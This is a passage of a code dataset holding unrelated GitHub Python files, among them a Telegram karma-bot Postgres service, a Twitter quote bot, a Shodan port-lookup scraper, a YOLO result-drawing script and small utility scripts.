\n]","repo_name":"alwinarakkal/firstv1","sub_path":"pro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34599442137","text":"from colours import *\nimport simplejson as json\nimport os, shutil\n\ndef writefile(fname,data,confdir=\"/etc/cluster.conf\",type=\"json\"):\n    #Write the configuration files into the /etc/cluster.conf directory\n    #Check that it exists; if not, create it\n    if not os.path.exists(confdir):\n        warning_msg(\"Creating conf directory: \" + confdir)\n        os.makedirs(confdir)\n    pathfile = confdir + \"/\" + fname\n    if os.path.exists(pathfile):\n        warning_msg(\"Making backup of: \" + pathfile)\n        shutil.move(pathfile,pathfile + '.old')\n    file_conf = open(pathfile,'w')\n    printout(\"Writing \" + type + \" file: \" + pathfile, GREEN)\n    if type == \"json\":\n        file_conf.write(json.dumps(data, sort_keys=True, indent=2))\n    if type == \"conf\":\n        file_conf.write(data)\n    if type == \"pxe\":\n        file_conf.write(data)\n    file_conf.close()\n\ndef header_msg(msg):\n    printout(\"++++++++++++++++++++++++++++++++++++++++++++\",CYAN)\n    printout(msg,BLUE)\n    printout(\"++++++++++++++++++++++++++++++++++++++++++++\",CYAN)\n\ndef footer_msg():\n    #printout(\"--------------------------------------------\\n\",CYAN)\n    print\n\ndef warning_msg(msg=\"\"):\n    printout(\"WARNING: \" + msg,WHITE)\n\ndef error_msg(msg=\"\"):\n    printout(msg,RED)\n    sys.exit()\n\ndef critical_data_check(d, msg):\n    if not d:\n        printout(msg,RED)\n        sys.exit()\n\ndef insert_dict(cur, list, value):\n    if len(list) == 1:\n        cur[list[0]] = value\n        return\n    if not cur.has_key(list[0]):\n        
cur[list[0]] = {}\n    insert_dict(cur[list[0]], list[1:], value)\n","repo_name":"Lufac/pycia","sub_path":"src/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36837500618","text":"inp = input(\"Enter the string : \")\r\nstring = \"\"\r\nfor i in range(0,len(inp)):\r\n    if i+1 < len(inp) and inp[i]==')' and inp[i+1] == '(' :\r\n        string = string + inp[i] + \"*\"\r\n    else:\r\n        string += inp[i]\r\nalpha = ['a','b','c','d','e','temp_res']\r\noper = ['+','-','*','/']\r\nstack = []\r\nstatus = True\r\nfor char in string:\r\n    if char in ['(']:\r\n        stack.append(char)\r\n    elif char in alpha:\r\n        stack.append(char)\r\n    elif char in oper:\r\n        stack.append(char)\r\n    elif char == ')':\r\n        if '(' in stack:\r\n            b = stack.pop()\r\n            op = stack.pop()\r\n            a = stack.pop()\r\n            if a not in alpha or b not in alpha or op not in oper:\r\n                status = False\r\n                break\r\n            stack.pop()\r\n            stack.append('temp_res')\r\n        else:\r\n            status = False\r\n            break\r\n    \r\nif len(stack)== 1 and stack[0] == 'temp_res' :\r\n    stack.pop()\r\nelif len(stack)== 3 and stack[0] == 'temp_res' and stack[2] == 'temp_res' and stack[1] in oper :\r\n    stack = []\r\n\r\nif stack ==[] and status == True :\r\n    print('Valid!!!')\r\nelse:\r\n    print('Invalid!!!')\r\n    \r\n    \r\n    \r\n\r\n","repo_name":"Harikrishnancse/ZOHO-Interview-Questions-Programs-Python","sub_path":"expression checker.py","file_name":"expression checker.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002099254","text":"# coding: utf8\n\"\"\"@package business.third_party_pay.jinge_card_resource\nRepresents an allocated JinGe meal card resource\n\n\"\"\"\n\nfrom business import model as business_model\n\n\nclass JinGeCardResource(business_model.Resource):\n\t\"\"\"\n\tAn allocated JinGe meal card resource\n\t\"\"\"\n\t__slots__ = (\n\t\t'type',\n\t\t'trade_id',\n\t\t'order_id',\n\t\t'money'\n\t)\n\n\tdef __init__(self, type, order_id, trade_id, money):\n\t\tbusiness_model.Resource.__init__(self)\n\t\tself.order_id = order_id\n\t\tself.trade_id = trade_id\n\t\tself.type = type\n\t\tself.money = money\n\n\tdef get_type(self):\n\t\treturn self.type\n","repo_name":"chengdg/apiserver","sub_path":"business/third_party_pay/jinge_card_resource.py","file_name":"jinge_card_resource.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73996470771","text":"import requests\nimport re\nimport time\nimport IPy\nimport sys\nclass shodan:\n    def __init__(self):\n        self.url = \"https://www.shodan.io/host/\"\n\n    def _get_html(self,url):\n        try:\n            req = requests.get(url,timeout=10)\n            code = req.status_code\n        except Exception as e:\n            print(\"Err:%s\" % e)\n            code = 404\n        if code == 200:\n            html = req.text\n        else:\n            html = ''\n        return html.strip()\n\n    def get_port(self,ip):\n        html = self._get_html(self.url+str(ip))\n        li_list = re.findall(r\"
  • (.*?)<\\/li>\",html,re.S)\n for li in li_list:\n re_port = re.search(r\"
    (.*?)<\\/div>\",li)\n re_protocol = re.search(r\"
    (.*?)<\\/div>\",li)\n re_state = re.search(r\"
    (.*?)<\\/div>\",li)\n re_server = re.search(r\"

    (.*?)<\\/small><\\/h3>\",li)\n port = re_port.group(1) if re_port else ''\n state = re_state.group(1) if re_state else ''\n server = re_server.group(1).replace(\"\",\"\t\") if re_server else ''\n print(ip,port,state,server)\ns=shodan()\nips = IPy.IP(sys.argv[1])\nfor ip in ips:\n print(ip)\n s.get_port(ip)\n\n","repo_name":"githubmaidou/tools","sub_path":"shodan.py","file_name":"shodan.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"21"} +{"seq_id":"5424186337","text":"#!/usr/bin/python3\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = \"https://swapi.co/api/people/?search=\" + sys.argv[1]\n r = requests.get(url)\n j = r.json()\n print('Number of results: {}'.format(j.get('count')))\n results = j.get('results')\n for result in results:\n print(result.get('name'))\n","repo_name":"FreeJules/holbertonschool-webstack_basics","sub_path":"0x03-python_web_scraping/5-starwars.py","file_name":"5-starwars.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30528097458","text":"\"\"\"Manages class for telegram service.\n\"\"\"\nfrom typing import List, Tuple, Optional, Dict\nfrom dataclasses import dataclass\nimport psycopg2\nfrom .models import User, Telegram_Chat, Telegram_Message, User_in_Chat\nimport logging\n\nclass InvalidDBConfig(Exception):\n pass\n\nclass UserNotFound(Exception):\n \"\"\"Returned when no valid user is found\"\"\"\n pass\n\n@dataclass\nclass PostgresDBConfig:\n \"\"\"Information to connect to postgres\"\"\"\n host: str\n database: str\n user: str\n password: str\n\n\nclass KarmabotDatabaseService:\n \"\"\"Base class for karmabot service\"\"\"\n #TODO: make sure all my methods have docstrings\n def get_karma_for_users_in_chat(self, chat_id: str) -> List[Tuple[str, str, int]]:\n \"\"\"Gets karma for user in chat\"\"\"\n raise NotImplementedError\n\n #TODO: determine if this should be on public api\n # def get_user_by_username(self, username: str) -> User:\n # raise NotImplementedError\n #TODO: don't return optional\n def get_random_witty_response(self) -> Optional[str]:\n raise NotImplementedError\n\n def save_or_create_user(self, user: User) -> User:\n raise NotImplementedError\n\n def save_or_create_chat(self, chat: Telegram_Chat) -> Telegram_Chat:\n raise NotImplementedError\n\n def user_reply_to_message(self,\n reply_from_user_unsaved: User,\n reply_to_user_unsaved: User,\n chat: Telegram_Chat,\n original_message: Telegram_Message,\n reply_message: Telegram_Message,\n karma: int):\n raise NotImplementedError\n\n def get_user_stats(self, username: str, chat_id: str) -> Dict:\n raise NotImplementedError\n\n def get_chat_info(self, chat_id: str) -> Dict:\n raise NotImplementedError\n\n def get_chat_name(self, chat_id: str) -> Optional[str]:\n raise NotImplementedError\n # TODO: give option for using day/week as well as start/end date\n\n def get_responses_per_day(self, chat_id: str) -> Optional[Tuple[str, str]]:\n \"\"\"Returns responses per day per chat\"\"\"\n raise NotImplementedError\n\n #TODO: throw exception if chat is not with bot\n def clear_chat_with_bot(self, chat_id, user_id):\n \"\"\"Clears all history from a chat but only if chat_id matches user_id\n If chat_id matches user_id then the chat is a 1 on 1 with a bot.\"\"\"\n raise NotImplementedError\n\n def get_chats_user_is_in(self, user_id: int) -> Optional[List[Tuple[str, str]]]:\n raise 
NotImplementedError\n\n    def use_command(self, command: str, user: User, chat_id: str):\n        raise NotImplementedError\n\n\nclass PostgresKarmabotDatabaseService(KarmabotDatabaseService):\n    \"\"\"Handles connections to Postgres\"\"\"\n    #TODO: trigger use_command on function invocations (perhaps add annotation?)\n    def __init__(self, db_config: PostgresDBConfig) -> None:\n        try:\n            self.conn = psycopg2.connect(\n                host=db_config.host,\n                database=db_config.database,\n                user=db_config.user,\n                password=db_config.password)\n        except psycopg2.OperationalError as oe:\n            raise oe\n\n    def get_karma_for_users_in_chat(self,\n                                    chat_id: str) -> List[Tuple[str, str, int]]:\n        \"\"\"Returns username, firstname, karma for all telegram users in a given chat\"\"\"\n        cmd = \"\"\"select username, first_name, karma from telegram_user tu\n        LEFT JOIN user_in_chat uic ON uic.user_id=tu.user_id\n        where uic.chat_id=%s;\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs:\n                # TODO: handle | psycopg2.ProgrammingError: relation \"user_in_chat\"\n                # does not exist\n                crs.execute(cmd, [chat_id])\n                return crs.fetchall()\n\n    def get_user_by_username(self, username: str) -> User:\n        \"\"\"Returns User given that user's username\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n                selectcmd = \"SELECT user_id, username, first_name, last_name from telegram_user tu where tu.username=%s\"\n                crs.execute(selectcmd, [username])\n                res = crs.fetchone()\n                return User(res[0], res[1], res[2], res[3])\n\n\n    def get_random_witty_response(self)-> Optional[str]:\n        \"\"\"Returns a random witty response. Uses USER_FIRST_NAME as replace string for actual user first name\"\"\"\n        cmd = \"\"\"SELECT response FROM attempted_self_plus_one_response ORDER BY RANDOM() LIMIT 1\"\"\"\n\n        with self.conn:\n            with self.conn.cursor() as crs:\n                crs.execute(cmd, [])\n                result = crs.fetchone()\n                if result is not None:\n                    return result[0]\n                else:\n                    return None\n\n    def save_or_create_user(self, user: User) -> User:\n        \"\"\"Creates a user in database if not exists, otherwise update values and return the new database copy of the User\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n                selectcmd = \"SELECT user_id, username, first_name, last_name from telegram_user tu where tu.user_id=%s\"\n                # TODO: upsert to update values otherwise username, firstname, lastname won't ever change\n                # print(\"user with id: \" + str(user_id) + \" not found: creating user\")\n                insertcmd = \"\"\"INSERT into telegram_user\n                (user_id, username, first_name, last_name) VALUES (%s,%s,%s,%s)\n                ON CONFLICT (user_id) DO UPDATE\n                SET username = EXCLUDED.username,\n                first_name = EXCLUDED.first_name,\n                last_name = EXCLUDED.last_name\n                \"\"\"\n                crs.execute(insertcmd,\n                            [user.get_user_id(),\n                             user.get_username(),\n                             user.get_first_name(),\n                             user.get_last_name()])\n                self.conn.commit()\n                crs.execute(selectcmd, [user.get_user_id()])\n                (user_id, username, first_name, last_name) = crs.fetchone()\n                return User(user_id, username, first_name, last_name)\n\n    def save_or_create_chat(self, chat: Telegram_Chat):\n        \"\"\"Creates chat if not exists otherwise updates chat_name\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n                insertcmd = \"\"\"INSERT into telegram_chat\n                (chat_id, chat_name) VALUES (%s,%s)\n                ON CONFLICT (chat_id) DO UPDATE\n                SET chat_name = EXCLUDED.chat_name\"\"\"\n                
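# upsert: insert the chat row, or refresh chat_name if it already exists\n                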
crs.execute(insertcmd, [chat.chat_id, chat.chat_name])\n                self.conn.commit()\n\n    def does_chat_exist(self, chat_id: str) -> bool:\n        \"\"\"Returns true if chat exists\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n                selectcmd = \"SELECT chat_id, chat_name FROM telegram_chat tc where tc.chat_id=%s\"\n                crs.execute(selectcmd, [chat_id])\n                return crs.fetchone() is not None\n\n    def save_or_create_user_in_chat(self,\n                                    user: User,\n                                    chat_id: str,\n                                    change_karma=0) -> User_in_Chat:\n        \"\"\"Creates user in chat if not exists otherwise updates user_in_chat karma\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n                # TODO: instead of select first, do insert and then trap exception\n                # if primary key exists\n                # selectcmd = \"SELECT user_id, chat_id, karma FROM user_in_chat uic where uic.user_id=%s AND uic.chat_id=%s\"\n\n                insertcmd_karma = \"\"\"INSERT into user_in_chat\n                (user_id, chat_id, karma) VALUES (%s,%s,%s)\n                ON CONFLICT (user_id,chat_id) DO UPDATE SET karma = user_in_chat.karma + %s\n                RETURNING karma\n                \"\"\"\n\n                # TODO: use named parameters instead of %s to not have to repeat\n                # these params\n                crs.execute(\n                    insertcmd_karma, [\n                        user.get_user_id(), chat_id, change_karma, change_karma])\n\n                row = crs.fetchone()\n                self.conn.commit()\n                karma = row[0]\n                return User_in_Chat(user.id, chat_id, karma)\n\n    def user_reply_to_message(self,\n                              reply_from_user_unsaved: User,\n                              reply_to_user_unsaved: User,\n                              chat: Telegram_Chat,\n                              original_message: Telegram_Message,\n                              reply_message: Telegram_Message,\n                              karma: int):\n        \"\"\"Processes a user replying to another user's message with a given karma.\n        Saves both users, both messages, updates user in chat and creates a user_reacted_to_message row\"\"\"\n        user: User = self.save_or_create_user(reply_from_user_unsaved)\n        reply_to_user: User = self.save_or_create_user(reply_to_user_unsaved)\n        if not self.does_chat_exist(chat.chat_id):\n            self.save_or_create_chat(chat)\n\n        uic: User_in_Chat = self.save_or_create_user_in_chat(user, chat.chat_id)\n        self.save_or_create_user_in_chat(reply_to_user, chat.chat_id)\n\n        insert_message = \"\"\"INSERT INTO telegram_message\n        (message_id,chat_id, author_user_id, message_text)\n        VALUES (%s,%s,%s,%s)\n        ON CONFLICT (message_id) DO UPDATE\n        SET message_text = EXCLUDED.message_text;\n        \"\"\"\n        inserturtm = \"\"\"INSERT INTO user_reacted_to_message\n        (user_id,message_id,react_score,react_message_id)\n        VALUES (%s,%s,%s,%s)\"\"\"\n\n        # TODO: manage this with a constraint rather than having to select\n        selecturtmunique = \"\"\"SELECT react_score from user_reacted_to_message urtm where urtm.user_id=%s and urtm.message_id=%s\"\"\"\n        # none if user hasn't reacted yet\n        user_previous_react = None\n        with self.conn:\n            with self.conn.cursor() as crs:\n                args_select_urtm = [uic.user_id, original_message.message_id]\n                crs.execute(selecturtmunique, args_select_urtm)\n                result = crs.fetchone()\n                if result is not None:\n                    user_previous_react = result[0]\n\n        # TODO: add guard for karma == 1 or == -1 up higher\n        if user_previous_react is None or user_previous_react != karma:\n            if karma in (1, -1):\n                self.save_or_create_user_in_chat(\n                    reply_to_user, chat.chat_id, change_karma=karma)\n            else:\n                #TODO: move logging into handler\n                logging.info(\n                    f\"invalid karma: {karma} passed to user_reply_to_message\")\n            with self.conn:\n                with self.conn.cursor() as crs:\n                    args_reply_message = [\n                        
reply_message.message_id,\n                        chat.chat_id,\n                        uic.user_id,\n                        reply_message.message_text]\n                    args_original_message = [\n                        original_message.message_id,\n                        chat.chat_id,\n                        original_message.author_user_id,\n                        original_message.message_text]\n                    crs.execute(insert_message, args_reply_message)\n                    crs.execute(insert_message, args_original_message)\n                    argsurtm = [\n                        uic.user_id,\n                        original_message.message_id,\n                        karma,\n                        reply_message.message_id]\n                    crs.execute(inserturtm, argsurtm)\n\n    #TODO: determine if this should be in the public api (super)\n    def did_user_react_to_messages(self, username: str) -> bool:\n        \"\"\"Returns true if a user has responded to some messages\"\"\"\n        select_user_replies = \"\"\"select username, message_id, react_score, react_message_id from telegram_user tu\n        left join user_reacted_to_message urtm on urtm.user_id=tu.user_id\n        where tu.username = %s\"\"\"\n        reacted_messages_result = None\n        with self.conn:\n            with self.conn.cursor() as crs:\n                crs.execute(select_user_replies, [username])\n                reacted_messages_result = crs.fetchone()\n        return reacted_messages_result is not None\n\n    def get_karma_for_user_in_chat(self,\n                                   username: str,\n                                   chat_id: str) -> Optional[int]:\n        \"\"\"Returns karma for a particular user in chat\n        if that uic does not exist, return None\"\"\"\n        cmd = \"\"\"select karma from telegram_user tu\n        LEFT JOIN user_in_chat uic ON uic.user_id=tu.user_id\n        where tu.username=%s AND uic.chat_id=%s\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs:\n                # TODO: handle | psycopg2.ProgrammingError: relation \"user_in_chat\"\n                # does not exist\n                crs.execute(cmd, [username, chat_id])\n                result = crs.fetchone()\n                if result is not None:\n                    return result[0]\n                return result\n\n    # TODO: pass in user_id\n    # TODO: implement this as a stored procedure instead since there is a number of round trips\n    # TODO: return some structure and then parse it\n\n    def get_user_stats(self, username: str, chat_id: str) -> Dict:\n        \"\"\"Returns Dictionary of statistics for a user given a username\"\"\"\n        user = self.get_user_by_username(username)\n        if user is None:\n            raise UserNotFound()\n        user_has_reacts = self.did_user_react_to_messages(username)\n        karma = self.get_karma_for_user_in_chat(username, chat_id)\n        if karma is None:\n            karma = 0\n\n        output_dict = None\n        if not user_has_reacts:\n            output_dict = {\n                'username': username,\n                'karma': karma,\n                'upvotes_given': 0,\n                'downvotes_given': 0,\n                'total_votes_given': 0,\n                'net_karma_given': 0}\n        else:\n            # how many reacts given out by user\n            how_many_user_reacted_to_stats = \"\"\"select react_score, count(react_score)from\n            (select username, message_id, react_score, react_message_id from telegram_user tu\n            left join user_reacted_to_message urtm on urtm.user_id=tu.user_id\n            where tu.username = %s) as sub left join telegram_message tm on tm.message_id= sub.message_id\n            where tm.chat_id=%s group by react_score;\"\"\"\n            # TODO: implement how many reacts received by user\n            negative_karma_given = 0\n            positive_karma_given = 0\n            with self.conn:\n                with self.conn.cursor() as crs:\n                    crs.execute(\n                        how_many_user_reacted_to_stats, [\n                            username, chat_id])\n                    rows = crs.fetchall()\n                    # there are at most two rows, one per react score\n                    for row in rows:\n                        if row[0] == -1:\n                            negative_karma_given = int(row[1])\n                        if row[0] == 1:\n                            positive_karma_given = int(row[1])\n\n            # TODO: make this output type a class instead to bundle this info\n            output_dict = {\n                'username': username,\n                'karma': karma,\n                'upvotes_given': positive_karma_given,\n                'downvotes_given': negative_karma_given,\n                'total_votes_given': 
positive_karma_given + negative_karma_given,\n                'net_karma_given': positive_karma_given - negative_karma_given}\n        return output_dict\n\n    def get_chat_info(self, chat_id: str) -> Dict:\n        \"\"\"Returns Dictionary of statistics for a chat given a chat_id\"\"\"\n        count_reacts_cmd = \"\"\"select count(tm.message_id) from user_reacted_to_message urtm\n        left join telegram_message tm ON tm.message_id = urtm.message_id\n        where tm.chat_id=%s\"\"\"\n        select_user_with_karma_count = \"\"\"\n        select count(*) from telegram_chat tc\n        left join user_in_chat uic on uic.chat_id = tc.chat_id\n        where tc.chat_id=%s\n        \"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs:\n                reply_count = None\n                user_with_karma_count = None\n                crs.execute(count_reacts_cmd, [chat_id])\n                result = crs.fetchone()\n                if result is not None:\n                    reply_count = result[0]\n                else:\n                    reply_count = 0\n\n                crs.execute(select_user_with_karma_count, [chat_id])\n                result = crs.fetchone()\n                if result is not None:\n                    user_with_karma_count = result[0]\n                else:\n                    user_with_karma_count = 0\n        return {'reply_count': reply_count,\n                'user_with_karma_count': user_with_karma_count}\n\n    def get_responses_per_day(self, chat_id: str) -> Optional[Tuple[str, str]]:\n        \"\"\"Returns responses per day per chat\"\"\"\n        cmd = \"\"\"select date_trunc('day',tm.message_time ) \"day\", count(*) as result_nums\n        from user_reacted_to_message urtm \n        LEFT JOIN telegram_message tm ON tm.message_id=urtm.message_id\n        WHERE tm.chat_id = %s AND tm.message_time is not null\n        group by 1\n        order by 1\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs:\n                crs.execute(cmd, [chat_id])\n                return crs.fetchall()\n\n    def clear_chat_with_bot(self, chat_id, user_id):\n        if chat_id != user_id:\n            raise ValueError(\"Not a chat with a bot. Don't delete group chats\")\n\n        chat_id_str = str(chat_id)\n        # delete user_in_chat\n        del_user_in_chat_cmd = \"DELETE FROM user_in_chat uic WHERE uic.chat_id = %s\"\n\n        # TODO: delete user_reacted_to_message find all message in chat, find all urtm with those messages then delete them\n        del_user_reacted_to_message_cmd = \"\"\"DELETE FROM user_reacted_to_message urtmd WHERE id IN\n        (select urtm.id as user_reacted_to_message_id FROM (select tm.message_id from telegram_message tm where tm.chat_id = %s) as message_in_chat\n        LEFT JOIN user_reacted_to_message urtm on urtm.message_id=message_in_chat.message_id);\"\"\"\n\n        # delete all telegram_messages with matching chat id\n        del_telegram_messages = \"\"\"DELETE FROM telegram_message tm WHERE tm.chat_id = %s\"\"\"\n\n        del_command_used = \"\"\"DELETE FROM command_used cu where chat_id=%s\"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs:\n                crs.execute(del_user_in_chat_cmd, [chat_id_str])\n                crs.execute(del_user_reacted_to_message_cmd, [chat_id_str])\n                crs.execute(del_telegram_messages, [chat_id_str])\n                crs.execute(del_command_used, [chat_id_str])\n    #TODO: don't return optional\n\n    def get_chats_user_is_in(self, user_id: int) -> Optional[List[Tuple[str, str]]]:\n        \"\"\"Returns a list of chat_ids and chat names \"\"\"\n        cmd = \"\"\"SELECT tc.chat_id, tc.chat_name from user_in_chat uic\n        LEFT JOIN telegram_chat tc on tc.chat_id = uic.chat_id\n        where uic.user_id = %s\n        \"\"\"\n        with self.conn:\n            with self.conn.cursor() as crs:\n                crs.execute(cmd, [user_id])\n                return crs.fetchall()\n\n    def 
get_chat_name(self, chat_id: str) -> Optional[str]:\n \"\"\"Returns chat name\"\"\"\n cmd = \"\"\"select chat_name from telegram_chat tc where tc.chat_id=%s\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(cmd, [chat_id])\n result = crs.fetchone()\n if result is None:\n return None\n else:\n return result[0] # unpack\n\n def create_chat_if_not_exists(self, chat_id: str):\n \"\"\"Creates chat if not exists otherwise does nothing\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n insertcmd = \"\"\"INSERT into telegram_chat\n (chat_id) VALUES (%s)\n ON CONFLICT (chat_id) DO NOTHING\"\"\"\n crs.execute(insertcmd, [chat_id])\n self.conn.commit()\n\n def use_command(self, command: str, user: User, chat_id: str, arguments=\"\"):\n \"\"\"Handler to log when commands are used and with which arguments\"\"\"\n self.create_chat_if_not_exists(chat_id)\n self.save_or_create_user(user)\n\n insertcmd = \"\"\"INSERT INTO command_used (command,arguments,user_id,chat_id) VALUES (%s,%s,%s,%s)\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(insertcmd, [command, arguments, user.id, chat_id])\n\n\nclass Neo4jKarmabotDatabaseService(KarmabotDatabaseService):\n \"\"\"Does connections to neo4j\"\"\"\n pass\n\n","repo_name":"schafezp/karmabot","sub_path":"karmabot/telegramservice.py","file_name":"telegramservice.py","file_ext":"py","file_size_in_byte":21661,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"29595566090","text":"import random\nimport tweepy\nimport click\n\ndef _get_random_quote():\n return random.choice(_quotes)\n\n@click.command()\n@click.argument(\"consumer_key\")\n@click.argument(\"consumer_secret\")\ndef authenticate(consumer_key, consumer_secret):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\n try:\n url = auth.get_authorization_url()\n except tweepy.TweepError:\n click.echo(\"Failed to get request token.\")\n\n click.echo(\"Setting up authentication. Please visit this URL:\")\n click.echo(url)\n verifier = click.prompt(\"Enter the authorisation PIN from Twitter\")\n\n try:\n auth.get_access_token(verifier)\n except tweepy.TweepError:\n click.echo(\"Error! 
Failed to get access token.\")\n\n with open(\"OAUTH_CONSUMER\", \"w\") as f:\n click.echo(consumer_key, file=f)\n click.echo(consumer_secret, file=f)\n\n with open(\"OAUTH_TOKEN\", \"w\") as f:\n click.echo(auth.access_token, file=f)\n click.echo(auth.access_token_secret, file=f)\n\n api = tweepy.API(auth)\n\n public_tweets = api.home_timeline()\n for tweet in public_tweets:\n click.echo(tweet.text)\n\n@click.command()\ndef tweet():\n with open(\"OAUTH_CONSUMER\", \"r\") as f:\n lines = f.readlines()\n consumer_key = lines[0]\n consumer_secret = lines[1]\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\n with open(\"OAUTH_TOKEN\", \"r\") as f:\n lines = f.readlines()\n access_token = lines[0]\n access_token_secret = lines[1]\n\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n\n api.update_status(_get_random_quote())\n\n@click.group()\ndef cli():\n pass\n\ncli.add_command(authenticate)\ncli.add_command(tweet)\n\nif __name__ == '__main__':\n cli()","repo_name":"pixelistik/twitter-reminderbot","sub_path":"reminderbot.py","file_name":"reminderbot.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43264776709","text":"import cv2\nimport os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimgPath=\"./haze\"\nresPath=\"./result/2/\"\n\n#先删掉txt开头结尾无用信息 第一个检测用时较长统一长度Predicted in 211.740000 milli-seconds -->21.740000 milli-seconds\nwith open(\"result.txt\", \"r\") as f:\n #print(type(f))\n name=\"\"\n imgList=[] #存放name每个图片为一个元素\n imgBoxes=[] #存放name+\"*\"+检测框,每个框为一个元素\n for line in f.readlines():\n line = line.strip('\\n') #去掉列表中每一个元素的换行符\n #Enter Image Path: /xxx/xxx/xxx/xxx/JPEGImages/huwai_1_000008.jpg: Predicted in 21.531000 milli-seconds.\n if line[18]==\"/\":\n # print(\"-----name-----\")\n #xx/xx/xx/huwai_1_000008.jpg -->huwai_1_000008\n name=line[70:][:-43]\n imgList.append(line[70:][:-43])\n #print(line[70:][:-43])\n else:\n # print(name+line)\n imgBoxes.append(name+\"*\"+line)\n #huwai_1_000008*class: 99%\t(left_x: 118 top_y: 63 width: 68 height: 62)\n # print(\"-----draw-----\")\n # if line[0:3]==\"cow\":\n # print(name+line)\n # else\n # for box in imgBoxes:\n # print(box[0:box.rfind('*')]) #取*前面的name\n # print(box[box.rfind('*')+1:]) #取*后面的name包含的box\n \n \n # for imgName in imgList:\n # print(imgName)\n # for box in imgBoxes:\n # print(box[0:box.rfind('*')])\n #得到两个List后\n \n cmap = plt.get_cmap('tab20b')\n colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]\n color = colors[int(4) % len(colors)]\n #修改int(4)里面的数字换为其他颜色\n color = [i * 255 for i in color] \n \n for imgName in imgList:\n i=0 #一个图片几个框\n im = cv2.imread(os.path.join(imgPath,imgName)+\".jpg\")\n print(imgName)\n for box in imgBoxes:\n i=i+1\n print(box[0:box.rfind('*')])\n if box[0:box.rfind('*')]==imgName: #匹配name,对于imgName的box\n boxList=box[box.rfind('*')+1:].split() #name包含的box [class,conf,_,x,_,y,_,w,_,h] str类型\n sx1=int(boxList[3])\n sy1=int(boxList[5])\n sx2=int(boxList[3])+int(boxList[7])\n sy2=int(boxList[5])+int(boxList[9][:-1])\n text=boxList[0]+boxList[1]\n \n #画框,文本\n cv2.rectangle(im,(sx1,sy1),(sx2,sy2),color,3)\n if sy1 > 25:\n cv2.rectangle(im, (sx1, sy1-20), (sx1+(len(boxList[0])+1)*17, sy1), color, -1)\n cv2.putText(im, text,(sx1, sy1-10),0, 0.75, (255,255,255),2)\n else:\n cv2.rectangle(im, (sx1, sy1), (sx1+(len(boxList[0])+1)*17, sy1+20), color, -1)\n cv2.putText(im, boxList[0] + boxList[1],(sx1, sy1+20),0, 0.75, (255,255,255),2)\n else:\n 
break \n        cv2.imwrite(os.path.join(resPath,imgName)+\"_result.jpg\",im)\n        print(\"save result:\\t\"+os.path.join(resPath,imgName)+\"_result.jpg\")\n        del imgBoxes[0:i-1] #remove the boxes that have already been drawn\n","repo_name":"fenglinlie/from-yolov3-result.txt-to-img","sub_path":"resDrawimg.py","file_name":"resDrawimg.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2571223363","text":"from flask import Flask, request, jsonify\nfrom flaskapp.libs.stringGetter import getPageString\nfrom flaskapp.libs.ssg.productsParser import getProducts\n\napp = Flask(__name__)\napp.debug = True\n\n@app.route('/api/crawling/getSSG', methods=['GET'])\ndef getProductsInfo():\n    keyword = request.args.get('keyword')\n    url = \"http://www.ssg.com/search.ssg?target=all&query=\" + keyword\n    pageString = getPageString(url)\n    print(getProducts(pageString))\n    return jsonify(getProducts(pageString))\n","repo_name":"owenyi/hanium","sub_path":"python/main/flaskapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22646537425","text":"import shutil\nfrom pathlib import Path\n\nbase_path = Path('ops_example')\nbase_path2 = Path('ops_example/D')\n\nif base_path.exists() and base_path.is_dir():\n    \"\"\"Recursively delete a directory tree.\"\"\"\n    shutil.rmtree(base_path) # remove the directory tree\n\n# create the directory\nbase_path.mkdir()\n\npath_b = base_path / 'A' / 'B' # ops_example/A/B\npath_c = base_path / 'A' / 'C'\npath_d = base_path / 'A' / 'D'\n\npath_b.mkdir(parents=True) # parents=True because directory A still has to be created before C\npath_c.mkdir() 